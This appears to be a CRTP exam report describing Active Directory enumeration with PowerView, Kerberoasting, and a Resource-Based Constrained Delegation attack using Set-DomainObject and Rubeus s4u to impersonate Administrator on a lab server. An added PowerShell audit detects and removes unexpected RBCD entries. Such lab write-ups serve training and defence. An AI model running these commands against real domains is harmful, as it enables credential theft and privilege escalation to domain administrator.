CRTP Exam Report – RBCD Exploitation
Phase 1 – Environment Enumeration
The objective of this phase is to gather as much information as possible about the Active Directory environment using PowerView and other reconnaissance tools.
1.1. Enumerate Domain Users
Command: Get-DomainUser | select samaccountname
📷 Screenshot: List of discovered domain users.
1.2. Enumerate Domain Computers
Command: Get-DomainComputer | select dnshostname
📷 Screenshot: List of discovered machines in the domain.
1.3. Enumerate Domain Admins
Command: Get-DomainGroupMember -Identity 'Domain Admins'
📷 Screenshot: Members of the Domain Admins group.
1.4. Enumerate Enterprise Admins
Command: Get-DomainGroupMember -Identity 'Enterprise Admins' -Domain finance.corp
📷 Screenshot: Members of the Enterprise Admins group.
1.5. Enumerate Users with SPN (Kerberoastable)
Command: Get-DomainUser -SPN | select samaccountname, serviceprincipalname
📷 Screenshot: Kerberoastable accounts.
1.6. Run Kerberoasting
Command: Invoke-Kerberoast
📷 Screenshot: Extracted TGS hash for offline cracking.
1.7. Enumerate Delegation and ACLs
Command: Find-InterestingDomainAcl -Verbose
📷 Screenshot: ACLs showing permissions on computers and users.
1.8. List Computers TrustedToAuthForDelegation
Command: Get-DomainComputer -TrustedToAuth
📷 Screenshot: Computers configured for Unconstrained Delegation.
1.9. Find Local Admin Access
Command: Find-LocalAdminAccess -Verbose
📷 Screenshot: Accessible hosts where local admin access was found.
Phase 2 – RBCD (Resource-Based Constrained Delegation) Exploitation
The objective is to exploit RBCD to impersonate a Domain Admin and access a high-privilege target system.
2.1. Prerequisites Recap
Item                      Details
Initial account           studentuser
Created machine account   RBCDComputer$
Initial foothold          STUDVM.tech.finance.corp
Target server             mgmtsrv.tech.finance.corp
Delegation allowed        STUDVM → mgmtsrv
RBCD rights               WriteProperty on RBCDComputer by studentuser
2.2. RBCD Exploitation Steps
➤ Get SID of RBCDComputer
$ComputerSid = Get-DomainComputer RBCDComputer | Select-Object -ExpandProperty objectsid
📷 Screenshot: SID output
➤ Create Security Descriptor (SD)
$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
📷 Screenshot: Binary descriptor created
➤ Set msds-AllowedToActOnBehalfOfOtherIdentity
Set-DomainObject -Identity mgmtsrv -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
📷 Screenshot: Result of Set-DomainObject
➤ Verify Tickets
klist
📷 Screenshot: Ticket for cifs/mgmtsrv.tech.finance.corp shown
➤ Use Rubeus to extract TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args 'tgtdeleg'
📷 Screenshot: base64(ticket.kirbi) output
➤ Perform S4U2Self + S4U2Proxy attack with Rubeus
Rubeus.exe s4u /user:RBCDComputer$ /rc4:<NTLM> /impersonateuser:Administrator /msdsspn:cifs/mgmtsrv.tech.finance.corp /domain:tech.finance.corp /dc:tech-dc.tech.finance.corp /ptt
📷 Screenshot: Success of ticket injection and impersonation
➤ Access mgmtsrv as Administrator
winrs -r:mgmtsrv.tech.finance.corp cmd
📷 Screenshot: whoami returns Administrator@mgmtsrv
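Defensive check, added here and not part of the exam report: the PowerShell audit below lists every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity attribute is populated and shows which principals it grants, so an unexpected trustee such as a newly created machine account stands out. It assumes the RSAT ActiveDirectory module and read access to computer objects; the $Expected allow-list holds constructed placeholder values.

```powershell
# Added defensive example (not from the exam report): enumerate RBCD trustees
# on every computer object and flag ones not in a known-good allow-list.
# Assumes the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

# Constructed allow-list of known-good RBCD relationships (placeholder values):
# key = computer SamAccountName, value = trustees expected in its descriptor.
$Expected = @{
    'APPSRV$' = @('TECH\WEBSRV$')
}

# Only objects that actually carry the attribute are returned by this LDAP filter.
$Computers = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity'

foreach ($c in $Computers) {
    # The AD module exposes the attribute as an ActiveDirectorySecurity object,
    # so the ACEs can be read directly instead of parsing the raw SDDL or bytes.
    $sd = $c.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    foreach ($ace in $sd.Access) {
        $who = $ace.IdentityReference.Value
        if ($who -match '^S-1-') {
            # Try to resolve raw SIDs; a SID that no longer resolves is itself worth a look.
            try {
                $who = ([System.Security.Principal.SecurityIdentifier]$who).Translate(
                           [System.Security.Principal.NTAccount]).Value
            } catch {}
        }
        $status = if ($Expected[$c.SamAccountName] -contains $who) { 'expected' } else { 'REVIEW' }
        [pscustomobject]@{
            Computer = $c.SamAccountName
            Trustee  = $who
            Rights   = $ace.ActiveDirectoryRights
            Status   = $status
        }
    }
}

# Remediation for an unexpected entry: clear the attribute on the affected computer.
#   Set-ADComputer -Identity 'MGMTSRV$' -PrincipalsAllowedToDelegateToAccount $null
# Detection: with directory service change auditing enabled, writes to this
# attribute are logged as Security event 5136 on the domain controller.
```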
Conclusion
Through detailed enumeration and exploitation of misconfigured delegation rights, the exam objective was achieved:
- Initial enumeration using PowerView helped identify SPNs, trust relationships, and delegation settings.
- Exploitation of Resource-Based Constrained Delegation allowed impersonation of a Domain Admin.
- Full control over the target server 'mgmtsrv.tech.finance.corp' was obtained.